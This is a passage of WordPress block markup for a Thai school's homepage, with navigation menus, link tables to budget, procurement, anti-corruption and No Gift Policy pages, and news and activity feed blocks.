data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม  No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout 